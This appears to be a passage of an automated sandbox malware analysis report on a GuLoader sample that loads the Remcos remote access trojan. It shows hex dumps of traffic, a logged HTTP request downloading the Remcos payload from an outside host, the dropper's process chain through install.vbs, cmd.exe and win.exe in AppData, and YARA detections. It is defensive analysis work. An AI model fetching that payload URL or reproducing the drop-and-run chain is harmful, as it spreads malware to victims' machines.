Jun 7, 2021 20:45:08.229844093 CEST	3737	IN	Data Raw: 51 bb 5e 76 61 c1 fa ff 40 35 06 94 14 88 dc 1f c6 1b a2 93 33 46 82 70 21 60 4d b0 ae c3 2a 9d f3 b9 49 ac 67 f8 54 d3 f3 3c ca af 96 87 d7 a5 ac 0b 5f 2d 35 fa 38 9d 63 cc ea b9 2a be 5c ca 8b 16 0f d1 31 c6 13 5f 20 25 49 44 f2 be 1a 33 34 a5 Data Ascii: Q^va@53Fp!`MIgT<_-58c\1_ %ID34QWM_XX&]Q2?<5PI%<7N%M Usmf0!B;$\|.;W/HP`rBG3*d#Fz[w(A,BUD
Jun 7, 2021 20:45:08.229860067 CEST	3738	IN	Data Raw: e8 5f 47 7e e9 92 2c 28 a2 4f de c6 7a 9a ba 3e 25 b4 74 e5 0a c8 fb 02 49 1c 76 f8 d3 a8 31 5e 7f a7 1a 36 be d0 4c b2 45 8e 2b d5 af c2 e6 4b 59 bf 85 ed e0 de 4c c8 ee fa 6f 75 8b d0 48 aa f0 ee c3 9c 64 8a bd 92 89 ef ce 41 09 c0 40 c7 db 34 Data Ascii: _G~,(Oz>%tIv1^6LE+KYLouHdA@4uK~bfTzzk%3bVnmdJEz\(+OPjACHdT>03=>l<6A\|HNq$et8gbx:a{4r]l9eOm
Jun 7, 2021 20:45:08.229875088 CEST	3739	IN	Data Raw: 8d ea 32 b3 f3 b5 73 b4 12 f0 69 61 e1 e0 1e 70 25 49 34 f2 be 1a 90 ec 46 de 77 b3 3c a7 ed 81 d4 d1 f1 f5 f7 57 50 98 37 3a 1e 26 1b 19 f0 8f 2d 30 8c 68 4d 5a 47 38 05 27 09 68 97 fc a3 b0 64 c9 49 25 42 6a a0 a9 b2 8e b3 17 57 2d 8d cb 59 16 Data Ascii: 2siap%I4Fw<WP7:&-0hMZG8'hdI%BjW-Y7a g/^EIbkG;;%9SDr<^0EqZ70:OF6j`<F]{:GIpAf,,ZkWt =IQZQ)~jp,SQPG
Jun 7, 2021 20:45:08.229892015 CEST	3741	IN	Data Raw: fc 6f a5 8b f5 81 bc 19 b9 c3 34 8e 9b 0e 80 c8 64 00 8d 55 ba 95 8a cb f8 30 f8 0e 21 7c fb 9a 17 8b 1a 30 72 cf 7e 9b f9 24 62 f8 d6 87 ff 39 2a 90 6f ee 71 c8 c8 ee bd 90 fa 4e a2 57 91 c3 25 ea 2b 7e 0a ea 07 45 25 c3 e8 91 bb 95 cf 0e ca 17 Data Ascii: o4dU0!\|0r~$b9oqNW%+~E%253qdS#,<0@0Eg`6<CX3/gRy(D[U4xQlx8Kuck&zAzhrck!xo&1'4?P3 TEqN
Jun 7, 2021 20:45:08.389385939 CEST	3770	IN	Data Raw: de 31 37 8f f7 5d a5 05 59 b1 b5 41 63 17 01 6c e8 87 00 48 51 9e b5 36 72 25 28 dc 06 76 13 2e e3 92 1b dc ac b0 61 c7 68 91 41 b8 2c 99 6b a0 85 e5 9f 89 69 78 4a 50 4b dc 1e 37 b1 00 7c c5 72 19 3c 4d 3a 5d b9 30 65 40 d3 bd dc 6b 5a 25 13 09 Data Ascii: 17]YAclHQ6r%(v.ahA,kixJPK7\|r<M:]0e@kZ%WT;q[L<M:t2TJ;j0qjosFqX2:.KU-pF:JB]'qC}N1rpme@$obM K\|Uw2%6*

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49756	192.185.113.219	80	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2021 20:45:19.587258101 CEST	3988	OUT	GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: ztechinternational.com Cache-Control: no-cache
Jun 7, 2021 20:45:19.764909983 CEST	3990	IN	HTTP/1.1 200 OK Date: Mon, 07 Jun 2021 18:45:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT Accept-Ranges: bytes Content-Length: 131136 Content-Type: application/octet-stream Data Raw: 50 2c b3 d2 5c 70 c4 73 b1 00 63 3a 7f 34 b0 da 59 59 73 a7 a2 aa d4 09 01 d4 f5 b0 f1 99 d5 8a e3 7f 62 2a 08 44 a5 2b 07 cf 73 d0 22 fa 29 cf ca f9 ec 43 ea 15 dc d9 72 c3 ae e4 a5 7b b5 2d 3f 6e 4a fa 24 28 dc 55 24 9e ab 9b 90 1b 23 fb 58 ec 8a 60 6e 54 94 7f 98 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 48 19 ef 15 d0 cc 4e 4b 62 f2 7d a7 50 40 5a 8d 59 e2 94 eb 3c 19 ab 57 fa f7 a3 cb 61 91 c7 ee ee 29 a2 ab 70 e7 dc 27 2c e7 ba 4f c7 9d d9 cd 22 fd 92 64 1c 67 1d 42 27 f1 76 24 c3 83 93 5a 16 5f 35 fe 24 35 d1 d5 50 df 36 6f 3a 5d fc 04 44 fa 9d ae 75 35 e4 c3 6e 2e c2 7f 16 56 1f 5b 92 c5 65 1a 02 1f ef 25 4e 2d fe 5b d0 8a 65 59 5e 74 95 e8 d3 a2 a6 cb 9f 6d 8e c6 f9 9c a1 7c 68 3b 0a 7a b2 98 44 da 98 a5 32 53 a5 d7 c3 84 38 a2 5d 1b 89 09 1d 32 9d 56 31 cd 51 4c 75 99 1e 20 e2 8e 9d 47 29 61 db 91 43 dd 35 6a c2 9d ba 20 2b 50 fb 9b 79 c2 a9 09 2f bc bb eb 2c 94 09 4d 03 2e 9e 6b c5 c0 10 be 94 8c f9 e3 b6 4b f1 8d 20 af 7c 90 9c c7 a7 22 4a eb 63 0b 66 df 14 93 e1 c7 5a f0 0c c1 a9 e5 f2 35 b1 3d 49 0e e3 4e ea d1 35 4d 6a 64 e3 dc 5a 41 3f 06 33 ac 53 14 bf 79 ca 85 c1 69 74 66 5c d7 f2 90 ff 67 14 2f e9 c1 7f 7b f1 b0 c9 06 2b db ba 6d 66 e2 fd b3 22 37 8e 0e 0a 4f 89 fd 1f f9 70 5e 15 58 f5 40 96 2f 59 7a 14 cf 2b 2a d9 ea 31 2f bc ee dc ec 41 22 1e 59 ef 71 1a 71 74 e0 c5 ef 58 b9 93 63 71 8e ee d3 89 64 83 49 59 3f 55 1f 89 75 59 23 83 6c b4 ab cd e8 9e 02 63 33 cf fd 77 e9 a9 27 06 5d 4b af b2 6f 78 44 ab 85 98 45 ab 75 6f 8f ba f2 a8 84 13 77 ab 2b 14 68 61 cc ad bb 31 17 6e 32 d0 6f 82 87 4f 7f 09 a3 56 7d 95 fb f6 bb b8 da 27 38 52 8b cc 26 9b 8a c3 00 43 cb a0 58 3c 4c 65 b4 de f4 c3 55 75 fd 2c 5e 3e 5d b1 6c 97 44 b2 d4 b1 0d 02 43 fd 5e cb 0a e8 63 8c b0 4b 67 71 fb a7 a5 5b cf 6e d1 9e 63 65 ee 75 b3 79 d1 29 ea c7 b7 bb 88 ed ea 7e 98 f1 10 d8 af 11 e3 e0 79 60 6b 57 95 21 17 e8 0a 20 bc 47 94 e5 ef 81 ee a3 73 45 03 6d 98 74 5f 48 ca a8 4a 84 dc e3 c3 60 0a 16 c7 46 6d 2c 3d cb e3 85 c5 50 e9 42 92 66 66 dc bf f0 6f e0 1a 12 3e 43 f5 34 7b 3c 0f 0c f8 a9 61 9b de 20 ab 7b bd 07 e2 94 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 e3 7f c3 80 c1 06 93 8c 18 51 6c e5 66 dd 02 9f 6b 57 42 d3 9b b4 56 5c 65 d1 1c 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 14 01 44 70 6f 81 a8 86 db 67 6d 38 28 05 f3 a9 dc b5 f6 32 37 14 d0 86 e0 ef 33 4c 9d 49 2e 16 2c b6 18 52 b3 a4 39 ac 38 ef 71 a2 4f 9b 03 bb 5e 1e 25 97 bb ff 16 96 ea 26 55 88 34 e9 97 1b a2 fb 0b 10 c3 70 77 c3 bd 02 ef c3 c2 7b a2 b9 49 c4 4b ae 15 d3 a5 9f 3e 1d d7 87 3f 73 fd 0b 5f ae f1 ea 9b 65 d1 8d ea 32 e6 78 59 22 39 57 0f d0 59 56 a1 1e 20 da 5c 78 a1 ff 1a 59 2f 2e 1c 5f f3 3c 4f 5f 94 d5 d1 a8 36 4e 6f e7 d9 37 c5 3b 6e 48 58 f0 da a6 dc df 3e c0 1f 4f 6f 55 9e 31 df d6 fc 5c a5 5c 9a 08 25 f9 22 17 e8 b2 05 78 ff 1d da 72 34 da fa 27 28 dc 55 20 9e ab 9b 6f e4 23 fb e0 ec 8a 60 6e 54 94 7f d8 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 b0 19 ef 15 de d3 f4 45 62 46 74 6a 71 f8 5b c1 94 c3 c0 83 55 6a 8b 27 88 98 c4 b9 00 fc e7 8d 8f 47 cc c4 04 c7 be 42 0c 95 cf 21 e7 f4 b7 ed 66 b2 c1 44 71 08 79 27 09 fc 7b 2e e7 83 93 5a 16 5f 35 fe 40 49 56 6c 70 c2 df 85 1a 40 15 ee 64 e7 74 44 18 0b 10 29 4f 33 2b 95 65 68 ef b1 b0 d8 8c Data Ascii: P,\psc:4YYsbD+s")Cr{-?nJ$(U$#X`nTkz(xU[")bqE`'2OGHNKb}P@ZY<Wa)p',O"dgB'v$Z_5$5P6o:]Du5n.V[e%N-[eY^tm\|h;zD2S8]2V1QLu G)aC5j +Py/,M.kK \|"JcfZ5=IN5MjdZA?3Syitf\g/{+mf"7Op^X@/Yz+1/A"YqqtXcqdIY?UuY#lc3w']KoxDEuow+ha1n2oOV}'8R&CX<LeUu,^>]lDC^cKgq[nceuy)~y`kW! GsEmt_HJ`Fm,=PBffo>C4{<a {8I6QlfkWBV\et}"Dpogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"xr4'(U o#`nTkz(xU[")bqE`'2OGEbFtjq[Uj'GB!fDqy'{.Z_5@IVlp@dtD)O3+eh
Jun 7, 2021 20:45:19.764949083 CEST	3991	IN	Data Raw: f0 22 02 06 cf 61 30 17 b1 8b 8b 80 b3 7f 69 7c 02 70 a3 41 21 bb 70 67 2c 31 9e 42 96 43 26 e3 90 7a 9a a9 30 bc b8 db b9 e7 d5 39 6e 17 bf b4 f1 a9 14 f5 d8 f2 4a d8 27 c9 57 9a 73 3f 3d 0b 64 55 45 cb 8b e5 8c aa 37 67 03 a1 f5 9a 3d c2 ba fb Data Ascii: "a0i\|pA!pg,1BC&z09nJ'Ws?=dUE7g=y/,EL.QK.wbKcf5mHN5]jdZA;3Syitf\g?{+mv"7Op^X@/Yz+*^A"q"}tXcq
Jun 7, 2021 20:45:19.764975071 CEST	3993	IN	Data Raw: 04 03 0c f8 a9 b1 9a de 20 bb 7b bd 07 22 95 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 a3 7f c3 c0 ef 74 f6 e0 77 32 6c e5 8a fb 02 9f 6b b7 43 d3 9b 84 56 5c 65 01 1d 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 54 01 44 32 6f 81 a8 86 db 67 6d 38 28 05 Data Ascii: {"8I6tw2lkCV\et}"TD2ogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"
Jun 7, 2021 20:45:19.765001059 CEST	3994	IN	Data Raw: c9 57 9a 73 3f 3d 0b 64 55 45 cb 8b e5 8c aa 37 67 03 a1 f5 9a 3d c2 ba fb 9b 79 c2 a9 09 2f bc eb ae 2c 94 45 4c 06 2e bb 14 51 9f 10 be 94 8c f9 e3 b6 4b 11 8d 2e ae 77 91 9a c7 a7 62 4b eb 63 bb 66 df 14 93 e1 c7 fe cf 0d c1 a9 f5 f2 35 b1 6d Data Ascii: Ws?=dUE7g=y/,EL.QK.wbKcf5mHN5]jdZA;3Syitf\g?{+mv"7Op^X@/Yz+*^A"q"}tXcqdIY?Uuulc3w']KoxDEuow+ha
Jun 7, 2021 20:45:19.765028954 CEST	3995	IN	Data Raw: 2e 9c 8e d0 6b 38 b4 22 db 94 5b d7 ed 5c 3d d8 8c b2 34 9a 67 62 8f 2d 23 41 e8 dc ba 59 f3 bc c4 83 89 4f fa 2f fe dc 49 78 41 ed 5c 1b db e6 54 53 a4 a1 b1 42 5d b8 65 54 d3 de 1e 25 97 d1 fd 41 c1 82 26 55 88 74 16 e2 13 65 be ff 11 c3 70 77 Data Ascii: .k8"[\=4gb-#AYO/IxA\TSB]eT%A&Utepw{+O^=/>LP= Qij&K8'`+2#??Y{\L`uGm\!wb Skp6ah9:,*=?Y)1k0
Jun 7, 2021 20:45:19.765064001 CEST	3997	IN	Data Raw: 9d 65 b2 af 8a 65 eb 63 bb 3f 86 49 51 e9 c7 ab 44 e1 3e dc fd 1a 70 b1 6d 48 57 be 8c ae d1 60 d6 86 ef a6 c4 df 81 46 04 00 6c 92 f4 bb 29 26 e5 e4 68 74 3f 01 14 a7 0b 11 98 61 37 83 d1 97 68 f1 b0 cb 5f ae 1b e3 19 7d 1d 88 af a9 ff 71 1b 26 Data Ascii: eec?IQD>pmHW`Fl)&ht?a7h_}q&B:%LDf"\weaXOkpa,HYf9(wc3wPG]ox$G7j9n2z\(,hf8tjvA\|L^DZ~]NY
Jun 7, 2021 20:45:19.765095949 CEST	3998	IN	Data Raw: 51 bb 5e 76 61 c1 fa ff 40 35 06 94 14 88 dc 1f c6 1b a2 93 33 46 82 70 21 60 4d b0 ae c3 2a 9d f3 b9 49 ac 67 f8 54 d3 f3 3c ca af 96 87 d7 a5 ac 0b 5f 2d 35 fa 38 9d 63 cc ea b9 2a be 5c ca 8b 16 0f d1 31 c6 13 5f 20 25 49 44 f2 be 1a 33 34 a5 Data Ascii: Q^va@53Fp!`MIgT<_-58c\1_ %ID34QWM_XX&]Q2?<5PI%<7N%M Usmf0!B;$\|.;W/HP`rBG3*d#Fz[w(A,BUD
Jun 7, 2021 20:45:19.765122890 CEST	4000	IN	Data Raw: e8 5f 47 7e e9 92 2c 28 a2 4f de c6 7a 9a ba 3e 25 b4 74 e5 0a c8 fb 02 49 1c 76 f8 d3 a8 31 5e 7f a7 1a 36 be d0 4c b2 45 8e 2b d5 af c2 e6 4b 59 bf 85 ed e0 de 4c c8 ee fa 6f 75 8b d0 48 aa f0 ee c3 9c 64 8a bd 92 89 ef ce 41 09 c0 40 c7 db 34 Data Ascii: _G~,(Oz>%tIv1^6LE+KYLouHdA@4uK~bfTzzk%3bVnmdJEz\(+OPjACHdT>03=>l<6A\|HNq$et8gbx:a{4r]l9eOm
Jun 7, 2021 20:45:19.765151024 CEST	4001	IN	Data Raw: 8d ea 32 b3 f3 b5 73 b4 12 f0 69 61 e1 e0 1e 70 25 49 34 f2 be 1a 90 ec 46 de 77 b3 3c a7 ed 81 d4 d1 f1 f5 f7 57 50 98 37 3a 1e 26 1b 19 f0 8f 2d 30 8c 68 4d 5a 47 38 05 27 09 68 97 fc a3 b0 64 c9 49 25 42 6a a0 a9 b2 8e b3 17 57 2d 8d cb 59 16 Data Ascii: 2siap%I4Fw<WP7:&-0hMZG8'hdI%BjW-Y7a g/^EIbkG;;%9SDr<^0EqZ70:OF6j`<F]{:GIpAf,,ZkWt =IQZQ)~jp,SQPG
Jun 7, 2021 20:45:19.765177011 CEST	4002	IN	Data Raw: fc 6f a5 8b f5 81 bc 19 b9 c3 34 8e 9b 0e 80 c8 64 00 8d 55 ba 95 8a cb f8 30 f8 0e 21 7c fb 9a 17 8b 1a 30 72 cf 7e 9b f9 24 62 f8 d6 87 ff 39 2a 90 6f ee 71 c8 c8 ee bd 90 fa 4e a2 57 91 c3 25 ea 2b 7e 0a ea 07 45 25 c3 e8 91 bb 95 cf 0e ca 17 Data Ascii: o4dU0!\|0r~$b9oqNW%+~E%253qdS#,<0@0Eg`6<CX3/gRy(D[U4xQlx8Kuck&zAzhrck!xo&1'4?P3 TEqN
Jun 7, 2021 20:45:19.925116062 CEST	4005	IN	Data Raw: de 31 37 8f f7 5d a5 05 59 b1 b5 41 63 17 01 6c e8 87 00 48 51 9e b5 36 72 25 28 dc 06 76 13 2e e3 92 1b dc ac b0 61 c7 68 91 41 b8 2c 99 6b a0 85 e5 9f 89 69 78 4a 50 4b dc 1e 37 b1 00 7c c5 72 19 3c 4d 3a 5d b9 30 65 40 d3 bd dc 6b 5a 25 13 09 Data Ascii: 17]YAclHQ6r%(v.ahA,kixJPK7\|r<M:]0e@kZ%WT;q[L<M:t2TJ;j0qjosFqX2:.KU-pF:JB]'qC}N1rpme@$obM K\|Uw2%6*

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe PID: 6696 Parent PID: 5924

General

Start time:	20:42:34
Start date:	07/06/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe PID: 7080 Parent PID: 6696

General

Start time:	20:43:01
Start date:	07/06/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 6480 Parent PID: 7080

General

Start time:	20:43:38
Start date:	07/06/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Imagebase:	0xff0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6884 Parent PID: 6480

General

Start time:	20:43:41
Start date:	07/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5700 Parent PID: 6884

General

Start time:	20:43:41
Start date:	07/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: win.exe PID: 5128 Parent PID: 6884

General

Start time:	20:43:42
Start date:	07/06/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\win.exe
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 6%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 5844 Parent PID: 3440

General

Start time:	20:43:44
Start date:	07/06/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 5852 Parent PID: 3440

General

Start time:	20:43:52
Start date:	07/06/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 5604 Parent PID: 5844

General

Start time:	20:44:25
Start date:	07/06/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 2796 Parent PID: 5128

General

Start time:	20:44:25
Start date:	07/06/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\win.exe
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: win.exe PID: 5544 Parent PID: 5852

General

Start time:	20:44:38
Start date:	07/06/2021
Path:	C:\Users\user\AppData\Roaming\win.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\win.exe'
Imagebase:	0x400000
File size:	110592 bytes
MD5 hash:	853744502B68E50E6CBAF81FFB3F5CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: backgroundTaskHost.exe PID: 7080 Parent PID: 792

General

Start time:	20:45:54
Start date:	07/06/2021
Path:	C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Imagebase:	0x7ff614b90000
File size:	19352 bytes
MD5 hash:	B7FC4A29431D4F795BBAB1FB182B759A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe PID: 6696 Parent PID: 5924 SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCOMMON

Executed Functions

Function 020B0CBA, Relevance: 12.2, APIs: 2, Strings: 4, Instructions: 1685COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
LO, xrefs: 020B0BBB
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: UY$Xkiu$dGi$ LO
API String ID: 2167126740-2284548343
Opcode ID: 583ce24712ad649ac0d7859ef62e3e26395f2ca46895e80922b0e2cb59fa5641
Instruction ID: 7b1ebbdf462543295d9d5a3af5aa06e008c03df10d504f202d85b54e9cc10874
Opcode Fuzzy Hash: 583ce24712ad649ac0d7859ef62e3e26395f2ca46895e80922b0e2cb59fa5641
Instruction Fuzzy Hash: 9DD28672A043499FDF369E38CD947EEB7A2BF95350F55412EDC899B250D3308A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B2B01, Relevance: 11.5, APIs: 1, Strings: 5, Instructions: 982COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
b^-j, xrefs: 020B2BAB
QVyy, xrefs: 020B2C8D
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QVyy$UY$Xkiu$b^-j$dGi
API String ID: 0-4198382633
Opcode ID: 004e5d60d29f8e4b53efb098c7fa099a672aab9d9eca6fb100b1c787c7f28ede
Instruction ID: e812358cb4f5fbb12e922734c3b52ce39e183f50531088522376b63f67b5eeb2
Opcode Fuzzy Hash: 004e5d60d29f8e4b53efb098c7fa099a672aab9d9eca6fb100b1c787c7f28ede
Instruction Fuzzy Hash: E082637160434A9FDB359E24CD907EEBBB2FF95390F91812EDC899B250D3354A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B1D2E, Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 924COMMON

Download Yara Rule

Strings

nA0, xrefs: 020B5503
Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi$nA0
API String ID: 0-2268840669
Opcode ID: dbfd418cad4285d83d183be6ae6617bb290ca7fa819a6b41696057411d15fc69
Instruction ID: 0b955c7a3e7bc859b8c2e61448a74d49c73a64338898f7080dd71c872968ccf0
Opcode Fuzzy Hash: dbfd418cad4285d83d183be6ae6617bb290ca7fa819a6b41696057411d15fc69
Instruction Fuzzy Hash: 4A72417260434A9FDB369E24CD907EE7BB2FF55390F55812EDD899B210D3318A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B2F3E, Relevance: 10.2, APIs: 2, Strings: 3, Instructions: 1451COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: UY$Xkiu$dGi
API String ID: 1029625771-2109732242
Opcode ID: b7c96ab1028390005c06e4cac94172181f72486b7ac6342e0b08d48fac0cf18f
Instruction ID: 021ab6a3f2ea9512a258a21d36dd3afba51bddde952dd22e361f16ce4b304782
Opcode Fuzzy Hash: b7c96ab1028390005c06e4cac94172181f72486b7ac6342e0b08d48fac0cf18f
Instruction Fuzzy Hash: 3DC2227160434A9FDB368F28CC907EEB7A2FF59350F65822EDC899B251D7309981DB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B28FE, Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 908libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 020B5CB3: NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

